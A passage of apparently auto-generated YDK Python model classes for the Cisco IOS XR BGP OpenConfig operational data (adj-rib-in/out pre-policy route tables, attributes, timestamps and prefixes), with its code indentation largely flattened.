            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes

Read-only operational node carrying one unrecognized BGP path attribute
(type code, length, and raw hex value).

.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization for this generated entity.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
# Leaf map: python attribute name -> (YLeaf descriptor, accepted python type names).
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
# Freeze last: after this, __setattr__ validation applies to assignments.
self._is_frozen = True
def __setattr__(self, name, value):
# Validate writes against the declared leaf list via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
# Deferred import: only load the generated meta table on demand.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
# Metadata accessor for the enclosing ExtAttributesList container;
# import deferred to avoid loading the large meta module at import time.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate

Read-only operational node holding the route's last-modified timestamp
as a single string leaf ('time-value'; format defined by the device).

.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
# Single string leaf; no child containers.
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leaf via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved

Read-only operational node holding the timestamp of the last UPDATE
received for this route. NOTE: the "Recieved" misspelling comes from the
underlying YANG model and is part of the public class name / segment
path; it must not be "corrected" here.

.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
# Single string leaf; no child containers.
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leaf via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
# Metadata accessor for the enclosing Route list entry; deferred import.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
# Metadata accessor for the enclosing Routes container; deferred import.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
pre\-policy table

NOTE(review): the generated description said "post\-policy", but this node
lives under "adj-rib-out-pre" (see yang_parent_name below), i.e. the
pre\-policy table; the description text is corrected accordingly.

.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-out-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
# Single uint64 counter leaf.
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leaf via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
# Metadata accessor for the enclosing AdjRibOutPre container; deferred import.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre']['meta_info']
class AdjRibInPre(_Entity_):
"""
Adjacency rib in\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Initialize the adj-rib-in-pre container: wires up its two child
# containers ('routes' and 'num-routes') and registers them in the
# name map used for YANG-name <-> python-attribute translation.
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, self).__init__()
self.yang_name = "adj-rib-in-pre"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child map: YANG child name -> (python attribute name, child class).
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-in-pre"
# Freeze last: after this, __setattr__ validation applies to assignments.
self._is_frozen = True
def __setattr__(self, name, value):
# No writable leafs on this container (empty leaf list); delegate to the
# YDK base helper for validation of child/attribute assignment.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Initialize the 'routes' container: holds the YList of Route entries.
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-in-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Single list child: YANG "route" -> python attribute 'route'.
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
# No writable leafs on this container; delegate validation to the base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Initialize one 'route' list entry of the adj-rib-in-pre table:
# six scalar leafs plus five child containers (prefix-name,
# route-attr-list, ext-attributes-list, last-modified-date,
# last-update-recieved).
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child map: YANG child name -> (python attribute name, child class).
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved))])
# Leaf map; 'route' and 'neighbor-address' accept two string forms
# (IPv4 and IPv6 patterns per the YANG union type).
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
# Instantiate and parent each child container, and register its YANG name.
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
# Freeze last: after this, __setattr__ validation applies to assignments.
self._is_frozen = True
def __setattr__(self, name, value):
# Validate writes against the six declared leaf names via the base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix

Read-only container pairing a prefix length leaf with a nested Prefix
container (AFI plus IPv4/IPv6 address leafs).

.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
# Wire up the nested Prefix child container.
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leaf via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix

Address value: an AFI discriminator plus IPv4 and IPv6 address leafs
(only the one matching the AFI is expected to be populated —
presumably; confirm against device behavior).

.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
